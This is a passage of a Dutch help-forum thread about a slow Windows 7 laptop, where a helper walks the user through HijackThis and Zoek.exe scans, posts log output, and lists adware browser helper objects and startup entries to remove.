Ga naar inhoud

Laptop is erg traag


Aanbevolen berichten

  • Reacties 32
  • Aangemaakt
  • Laatste reactie

Beste reacties in dit topic

We zullen eens kijken of er soms een bsmetting in het spel is die door de mazen van het AVAST net is geglipt.

1. Download HijackThis. (klik er op)

De download start automatisch na 5 seconden.

Bestand HijackThis.msi opslaan. Daarna kiezen voor "uitvoeren".

Hijackthis wordt nu op je PC geïnstalleerd, een snelkoppeling wordt op je bureaublad geplaatst.

Als je geen netwerkverbinding meer hebt, kan je de download doen met een andere PC en het bestand met een USB-stick overbrengen

Als je enkel nog in veilige modus kan werken, moet je de executable (HijackThis.exe) downloaden. Dit kan je HIER doen.

Sla deze op in een nieuwe map op de C schijf (bvb C:\\hijackthis) en start hijackthis dan vanaf deze map. De logjes kan je dan ook in die map terugvinden.


2. Klik op de snelkoppeling om HijackThis te starten. (lees eerst de rode tekst hieronder!)

Klik ofwel op "Do a systemscan and save a logfile", ofwel eerst op "Scan" en dan op "Savelog".

Er opent een kladblokvenster, hou gelijktijdig de CTRL en A-toets ingedrukt, nu is alles geselecteerd. Hou gelijktijdig de CTRL en C-toets ingedrukt, nu is alles gekopieerd. Plak nu het HJT logje in je bericht door CTRL en V-toets.

Krijg je een melding ""For some reason your system denied writing to the Host file ....", klik dan gewoon door op de OK-toets.

Let op : Windows Vista & 7 gebruikers dienen HijackThis als “administrator” uit te voeren via rechtermuisknop “als administrator uitvoeren". Indien dit via de snelkoppeling niet lukt voer je HijackThis als administrator uit in de volgende map : C:\\Program Files\\Trend Micro\\HiJackThis of C:\\Program Files (x86)\\Trend Micro\\HiJackThis. (Bekijk hier de afbeelding ---> Klik hier)


3. Na het plaatsen van je logje wordt dit door een expert nagekeken en hij begeleidt jou verder door het ganse proces.

Tip!

Wil je in woord en beeld weten hoe je een logje met HijackThis maakt en plaatst op het forum, klik dan HIER.

Link naar reactie
Delen op andere sites

Hier is het log

Logfile of Trend Micro HijackThis v2.0.4

Scan saved at 0:17:42, on 17-7-2013

Platform: Windows 7 SP1 (WinNT 6.00.3505)

MSIE: Internet Explorer v8.00 (8.00.7601.17514)

Boot mode: Normal

Running processes:

C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe

C:\Users\Kim\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe

C:\Users\Kim\AppData\Roaming\Spotify\spotify.exe

C:\Users\Kim\AppData\Roaming\Yontoo\YontooDesktop.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe

C:\Program Files\AVAST Software\Avast\AvastUI.exe

C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe

C:\Program Files (x86)\Internet Explorer\IELowutil.exe

C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = Bing

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = Google

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = MSN NL: Hotmail, Outlook, Skype, Messenger, het laatste nieuws, entertainment en meer!

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = Bing

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = Bing

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = Search

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =

F2 - REG:system.ini: UserInit=userinit.exe

O2 - BHO: SearchNewTab - {024B5793-8559-9E62-14A2-819E7773D8C5} - C:\ProgramData\SearchNewTab\51aede6844d1b.dll

O2 - BHO: HP Print Enhancer - {0347C33E-8762-4905-BF09-768834316C61} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll

O2 - BHO: BBrowsee2sauvee - {0E572BBB-21C5-7F26-57B4-198B6418F263} - C:\ProgramData\BBrowsee2sauvee\516eddb9815dd.dll

O2 - BHO: BrouwsEe2save - {12E48EC3-DAE3-2ED8-B71F-31DA42D2801F} - C:\ProgramData\BrouwsEe2save\515f3ae58b6c8.dll

O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll

O2 - BHO: BrooWese22saove - {2A4ECCE8-8568-8D63-8E87-7BDAB7BB4540} - C:\ProgramData\BrooWese22saove\51682c6333511.dll

O2 - BHO: conotinuetossave - {3BD59E58-1988-AF8D-D8EF-294E1C56475E} - C:\ProgramData\conotinuetossave\51af934972545.dll

O2 - BHO: SearchNewTab - {48903315-A4D5-B3BA-ADA2-A5D6CE3C1F0C} - C:\ProgramData\SearchNewTab\51bf0888525c2.dll

O2 - BHO: SEarcHH-NNeWWTTaab - {4BC59B36-3D9F-69FF-9199-D601399B9BA5} - C:\ProgramData\SEarcHH-NNeWWTTaab\516edddbc2a35.dll

O2 - BHO: Searrcho--NNeuwuTAbi - {4C72B9BB-6781-1173-877B-7738DF52FFB1} - C:\ProgramData\Searrcho--NNeuwuTAbi\51693aa283a15.dll

O2 - BHO: SeArrcHH-NeewTab - {5A4B963E-8E4D-EE74-2E10-62D6FB81CF0E} - C:\ProgramData\SeArrcHH-NeewTab\51682c92deaab.dll

O2 - BHO: SearchNewTab - {5B70EDF0-B5D6-2896-E13C-18E118BFF38C} - C:\ProgramData\SearchNewTab\51a5c4dd1fc68.dll

O2 - BHO: Incredibar.com Helper Object - {6E13DDE1-2B6E-46CE-8B66-DC8BF36F6B99} - C:\Program Files (x86)\Incredibar.com\incredibar\1.5.11.14\bh\incredibar.dll

O2 - BHO: Java Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll

O2 - BHO: Browusue2suave - {7F34C586-6921-83D8-155D-AC4B6BA7BAE7} - C:\ProgramData\Browusue2suave\516923512bae1.dll

O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll

O2 - BHO: contiinUEEtosaVe - {8F45B891-B9A9-CB54-0ED1-0F93D78D1630} - C:\ProgramData\contiinUEEtosaVe\51aede600e4aa.dll

O2 - BHO: Aanmeldhulp voor Microsoft-account - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O2 - BHO: SeaRch-NewiTaab - {A3602356-D596-EA2C-A573-868BC66CF4C0} - C:\ProgramData\SeaRch-NewiTaab\51a92c0abe169.dll

O2 - BHO: YrJie New Games - {A86EFAD9-8377-476D-9192-CF440B6F88EC} - C:\Program Files (x86)\IeAdsBlocker.dll

O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll

O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files (x86)\Google\GoogleToolbarNotifier\5.7.8313.1002\swg.dll

O2 - BHO: conytyinnuuetuoussaovvei - {B3AE0881-79B2-75B2-BB59-F266AB2956F6} - C:\ProgramData\conytyinnuuetuoussaovvei\51a5c4b0ecd63.dll

O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL

O2 - BHO: safe saaVE - {B8DAE3E7-3B0F-E1FB-24CC-1E707E5A895D} - C:\ProgramData\safe saaVE\51befd9d06e09.dll

O2 - BHO: SearchNewTab - {C7951997-F924-A43C-6EB5-2F8C8CF68589} - C:\ProgramData\SearchNewTab\51af934f7e261.dll

O2 - BHO: conTinuEtosaavee - {DADFFA21-EA6A-B9C0-A1F6-CEA30C1302B1} - C:\ProgramData\conTinuEtosaavee\51a92b6670728.dll

O2 - BHO: Java Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll

O2 - BHO: Browseo2sAAviee - {DD91527A-6351-EDEF-1647-E4EE5D9E5E75} - C:\ProgramData\Browseo2sAAviee\51693a78b502e.dll

O2 - BHO: BBrowsee2sauvee - {FA060B01-161D-A876-DF07-052DF6B3FE99} - C:\ProgramData\BBrowsee2sauvee\516eb66a67ab9.dll

O2 - BHO: SEarcHH-NNeWWTTaab - {FD170A41-6165-A7B7-87A7-2D45DC20934A} - C:\ProgramData\SEarcHH-NNeWWTTaab\516eb69d542e6.dll

O2 - BHO: Searochh-NuewaTaab - {FD3F5C3A-2AA8-89F7-AA92-D187D56416A9} - C:\ProgramData\Searochh-NuewaTaab\51692369ba62d.dll

O2 - BHO: Yontoo Layers - {FD72061E-9FDE-484D-A58A-0BAB4151CAD8} - C:\Program Files (x86)\Yontoo\YontooIEClient.dll

O2 - BHO: HP Smart BHO Class - {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll

O3 - Toolbar: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll

O3 - Toolbar: Incredibar Toolbar - {F9639E4A-801B-4843-AEE3-03D9DA199E77} - C:\Program Files (x86)\Incredibar.com\incredibar\1.5.11.14\incredibarTlbr.dll

O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll

O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"

O4 - HKLM\..\Run: [avast] "C:\Program Files\AVAST Software\Avast\avastUI.exe" /nogui

O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

O4 - HKCU\..\Run: [indxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020

O4 - HKCU\..\Run: [spotify Web Helper] "C:\Users\Kim\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"

O4 - HKCU\..\Run: [spotify] "C:\Users\Kim\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart

O4 - HKCU\..\Run: [Yontoo Desktop] "C:\Users\Kim\AppData\Roaming\Yontoo\YontooDesktop.exe"

O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe

O8 - Extra context menu item: E&xporteren naar Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE/3000

O9 - Extra button: Toon of verberg HP Smart Web Printing - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll

O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll

O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL

O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll

O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL

O20 - AppInit_DLLs: c:\progra~2\browse~1\sprote~1.dll c:\progra~2\contin~1\sprote~1.dll c:\progra~2\safesa~1\sprote~1.dll c:\progra~2\websea~1\sprote~1.dll

O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)

O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)

O23 - Service: avast! Antivirus - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe

O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)

O23 - Service: Google Update-service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

O23 - Service: Google Update-service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe

O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)

O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBService.exe

O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: NMIndexingService - Nero AG - C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe

O23 - Service: Online Games Manager (ogmservice) - RealNetworks, Inc. - C:\Program Files (x86)\Online Games Manager\ogmservice.exe

O23 - Service: PLFlash DeviceIoControl Service - Prolific Technology Inc. - C:\Windows\SysWOW64\IoctlSvc.exe

O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)

O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe

O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)

O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)

O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)

O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)

O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)

O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)

O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)

O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)

O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)

O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--

End of file - 13289 bytes

Link naar reactie
Delen op andere sites

Let op : Windows Vista & 7 gebruikers dienen HijackThis als “administrator” uit te voeren via rechtermuisknop “als administrator uitvoeren". Indien dit via de snelkoppeling niet lukt voer je HijackThis als administrator uit in de volgende map : C:\Program Files\Trend Micro\HiJackThis of C:\Program Files (x86)\Trend Micro\HiJackThis.

Start Hijackthis op. Selecteer “Scan”. Selecteer alleen de items die hieronder zijn genoemd:

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = Search

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =

O2 - BHO: SearchNewTab - {024B5793-8559-9E62-14A2-819E7773D8C5} - C:\ProgramData\SearchNewTab\51aede6844d1b.dll

O2 - BHO: BBrowsee2sauvee - {0E572BBB-21C5-7F26-57B4-198B6418F263} - C:\ProgramData\BBrowsee2sauvee\516eddb9815dd.dll

O2 - BHO: BrouwsEe2save - {12E48EC3-DAE3-2ED8-B71F-31DA42D2801F} - C:\ProgramData\BrouwsEe2save\515f3ae58b6c8.dll

O2 - BHO: BrooWese22saove - {2A4ECCE8-8568-8D63-8E87-7BDAB7BB4540} - C:\ProgramData\BrooWese22saove\51682c6333511.dll

O2 - BHO: conotinuetossave - {3BD59E58-1988-AF8D-D8EF-294E1C56475E} - C:\ProgramData\conotinuetossave\51af934972545.dll

O2 - BHO: SearchNewTab - {48903315-A4D5-B3BA-ADA2-A5D6CE3C1F0C} - C:\ProgramData\SearchNewTab\51bf0888525c2.dll

O2 - BHO: SEarcHH-NNeWWTTaab - {4BC59B36-3D9F-69FF-9199-D601399B9BA5} - C:\ProgramData\SEarcHH-NNeWWTTaab\516edddbc2a35.dll

O2 - BHO: Searrcho--NNeuwuTAbi - {4C72B9BB-6781-1173-877B-7738DF52FFB1} - C:\ProgramData\Searrcho--NNeuwuTAbi\51693aa283a15.dll

O2 - BHO: SeArrcHH-NeewTab - {5A4B963E-8E4D-EE74-2E10-62D6FB81CF0E} - C:\ProgramData\SeArrcHH-NeewTab\51682c92deaab.dll

O2 - BHO: SearchNewTab - {5B70EDF0-B5D6-2896-E13C-18E118BFF38C} - C:\ProgramData\SearchNewTab\51a5c4dd1fc68.dll

O2 - BHO: Incredibar.com Helper Object - {6E13DDE1-2B6E-46CE-8B66-DC8BF36F6B99} - C:\Program Files (x86)\Incredibar.com\incredibar\1.5.11.14\bh\incredibar.dll

O2 - BHO: Browusue2suave - {7F34C586-6921-83D8-155D-AC4B6BA7BAE7} - C:\ProgramData\Browusue2suave\516923512bae1.dll

O2 - BHO: contiinUEEtosaVe - {8F45B891-B9A9-CB54-0ED1-0F93D78D1630} - C:\ProgramData\contiinUEEtosaVe\51aede600e4aa.dll

O2 - BHO: SeaRch-NewiTaab - {A3602356-D596-EA2C-A573-868BC66CF4C0} - C:\ProgramData\SeaRch-NewiTaab\51a92c0abe169.dll

O2 - BHO: YrJie New Games - {A86EFAD9-8377-476D-9192-CF440B6F88EC} - C:\Program Files (x86)\IeAdsBlocker.dll

O2 - BHO: conytyinnuuetuoussaovvei - {B3AE0881-79B2-75B2-BB59-F266AB2956F6} - C:\ProgramData\conytyinnuuetuoussaovvei\51a5c4b0ecd63.dll

O2 - BHO: safe saaVE - {B8DAE3E7-3B0F-E1FB-24CC-1E707E5A895D} - C:\ProgramData\safe saaVE\51befd9d06e09.dll

O2 - BHO: SearchNewTab - {C7951997-F924-A43C-6EB5-2F8C8CF68589} - C:\ProgramData\SearchNewTab\51af934f7e261.dll

O2 - BHO: conTinuEtosaavee - {DADFFA21-EA6A-B9C0-A1F6-CEA30C1302B1} - C:\ProgramData\conTinuEtosaavee\51a92b6670728.dll

O2 - BHO: Browseo2sAAviee - {DD91527A-6351-EDEF-1647-E4EE5D9E5E75} - C:\ProgramData\Browseo2sAAviee\51693a78b502e.dll

O2 - BHO: BBrowsee2sauvee - {FA060B01-161D-A876-DF07-052DF6B3FE99} - C:\ProgramData\BBrowsee2sauvee\516eb66a67ab9.dll

O2 - BHO: SEarcHH-NNeWWTTaab - {FD170A41-6165-A7B7-87A7-2D45DC20934A} - C:\ProgramData\SEarcHH-NNeWWTTaab\516eb69d542e6.dll

O2 - BHO: Searochh-NuewaTaab - {FD3F5C3A-2AA8-89F7-AA92-D187D56416A9} - C:\ProgramData\Searochh-NuewaTaab\51692369ba62d.dll

O2 - BHO: Yontoo Layers - {FD72061E-9FDE-484D-A58A-0BAB4151CAD8} - C:\Program Files (x86)\Yontoo\YontooIEClient.dll

O3 - Toolbar: Incredibar Toolbar - {F9639E4A-801B-4843-AEE3-03D9DA199E77} - C:\Program Files (x86)\Incredibar.com\incredibar\1.5.11.14\incredibarTlbr.dll

O4 - HKCU\..\Run: [Yontoo Desktop] "C:\Users\Kim\AppData\Roaming\Yontoo\YontooDesktop.exe"

O20 - AppInit_DLLs: c:\progra~2\browse~1\sprote~1.dll c:\progra~2\contin~1\sprote~1.dll c:\progra~2\safesa~1\sprote~1.dll c:\progra~2\websea~1\sprote~1.dll

Klik op 'Fix checked' om de items te verwijderen.

Download 51a612a8b27e2-Zoek.pngzoek.exe naar het bureaublad.

  • Schakel je antivirus- en antispywareprogramma's uit, mogelijk kunnen ze conflicteren met zoek.exe
    (hier of hier) kan je lezen hoe je dat doet.
  • Dubbelklik op Zoek.exe om de tool te starten.
  • Windows Vista, 7 en 8 gebruikers dienen de tool als "administrator" uit te voeren door middel van de rechtermuisknop en kiezen voor Als Administrator uitvoeren.
  • Klik op de knop "Options" en vink nu de onderstaande opties aan.

    • Running processes
    • Recently Created
    • Startup Information
    • Installed Programs
    • HijackThis Log

    [*] Klik nu op de knop "Run script".

    [*] Wacht nu geduldig af tot er een logje opent (dit kan na een herstart zijn als deze benodigd is).

    [*] Mocht na de herstart geen logje verschijnen, start zoek.exe dan opnieuw, de log verschijnt dan alsnog.

    [*] Post nu de inhoud van het geopende logje in het volgende bericht.

Link naar reactie
Delen op andere sites

Zoek.exe Version 4.0.0.4 Updated 17-July-2013

Tool run by Kim on wo 17-07-2013 at 22:06:56,11.

Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 x64

Running in: Normal Mode Internet Access Detected

==== Running Processes ======================

C:\Windows\system32\csrss.exe

C:\Windows\system32\wininit.exe

C:\Windows\system32\csrss.exe

C:\Windows\system32\services.exe

C:\Windows\system32\winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\system32\atiesrxx.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\atieclxx.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Program Files\AVAST Software\Avast\AvastSvc.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\Dwm.exe

C:\Windows\Explorer.EXE

C:\Windows\system32\taskhost.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Windows\SysWOW64\svchost.exe -k hpdevmgmt

C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBService.exe

C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe

C:\Windows\System32\svchost.exe -k HPZ12

C:\Program Files (x86)\Online Games Manager\ogmservice.exe

C:\Windows\SysWOW64\IoctlSvc.exe

C:\Windows\System32\svchost.exe -k HPZ12

C:\Windows\system32\svchost.exe -k imgsvc

C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

C:\Program Files (x86)\Yontoo\Y2Desktop.Updater.exe

C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe

C:\Users\Kim\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe

C:\Users\Kim\AppData\Roaming\Spotify\spotify.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe

C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe

C:\Windows\system32\svchost.exe -k HPService

C:\Windows\system32\SearchIndexer.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Program Files\Windows Media Player\wmpnetwk.exe

C:\Program Files\AVAST Software\Avast\AvastUI.exe

C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe

C:\Windows\System32\svchost.exe -k secsvcs

C:\Users\Kim\Baking Success\BSLauncher.exe

C:\Windows\system32\conhost.exe

C:\Users\Kim\Baking Success\BakingSuccess.exe

C:\Program Files (x86)\Internet Explorer\IELowutil.exe

C:\Program Files\Internet Explorer\iexplore.exe

C:\Program Files\Internet Explorer\iexplore.exe

C:\Windows\system32\Macromed\Flash\FlashUtil64_11_7_700_224_ActiveX.exe

C:\Program Files\Internet Explorer\iexplore.exe

C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0CZ3JSLE\zoek[1].exe

C:\Windows\system32\taskhost.exe

C:\Windows\system32\conhost.exe

C:\Users\Kim\zoek.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Users\Kim\zoek.exe

C:\Windows\system32\conhost.exe

==== System Restore Info ======================

17-7-2013 22:08:09 Zoek.exe System Restore Point Created Succesfully.

Zoek.exe Version 4.0.0.4 Updated 17-July-2013

Tool run by Kim on wo 17-07-2013 at 22:08:50,65.

Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 x64

Running in: Normal Mode No Internet Access Detected

==== Installed Programs ======================

64 Bit HP CIO Components Installer

Adobe Flash Player 11 ActiveX

Adobe Flash Player 11 Plugin

Adobe Reader XI (11.0.02) - Nederlands

avast Free Antivirus

BBrowsee2sauvee

BrowseToSave 1.74

BufferChm

Burger Shop 2

C4700

conotinuetossave

ContinueToSave 1.74

D3DX10

Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition

Destinations

DeviceDiscovery

Dll-Files.com Fixer

FTDownloader

GoforFiles

Google Chrome

Google Toolbar for Internet Explorer

Google Update Helper

GPBaseService2

Hearts Medicine - Season One Deluxe

HiJackThis

HP Customer Participation Program 13.0

HP Imaging Device Functions 13.0

HP Photosmart C4700 All-In-One Driver Software 13.0 Rel .6

HP Print Projects 1.0

HP Smart Web Printing 4.5

HP Solution Center 13.0

HP Update

HPDiagnosticAlert

HPPhotoGadget

hpPrintProjects

HPProductAssistant

HPSSupply

hpWLPGInstaller

Incredibar Toolbar on IE

Java 7 Update 25

Java Auto Updater

Junk Mail filter update

MarketResearch

Microsoft .NET Framework 4 Client Profile

Microsoft .NET Framework 4 Client Profile NLD Language Pack

Microsoft .NET Framework 4 Extended

Microsoft .NET Framework 4 Extended NLD Language Pack

Microsoft Application Error Reporting

Microsoft Office 2010 Service Pack 1 (SP1)

Microsoft Office Access MUI (Dutch) 2010

Microsoft Office Excel MUI (Dutch) 2010

Microsoft Office Groove MUI (Dutch) 2010

Microsoft Office InfoPath MUI (Dutch) 2010

Microsoft Office Office 32-bit Components 2010

Microsoft Office OneNote MUI (Dutch) 2010

Microsoft Office Outlook MUI (Dutch) 2010

Microsoft Office PowerPoint MUI (Dutch) 2010

Microsoft Office Professional Plus 2010

Microsoft Office Proof (Dutch) 2010

Microsoft Office Proof (English) 2010

Microsoft Office Proof (French) 2010

Microsoft Office Proof (German) 2010

Microsoft Office Proofing (Dutch) 2010

Microsoft Office Publisher MUI (Dutch) 2010

Microsoft Office Shared 32-bit MUI (Dutch) 2010

Microsoft Office Shared MUI (Dutch) 2010

Microsoft Office Word MUI (Dutch) 2010

Microsoft Silverlight

Microsoft SQL Server 2005 Compact Edition [ENU]

Microsoft Visual C++ 2005 Redistributable

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219

Microsoft XNA Framework Redistributable 3.1

Movie Maker

MSVCRT

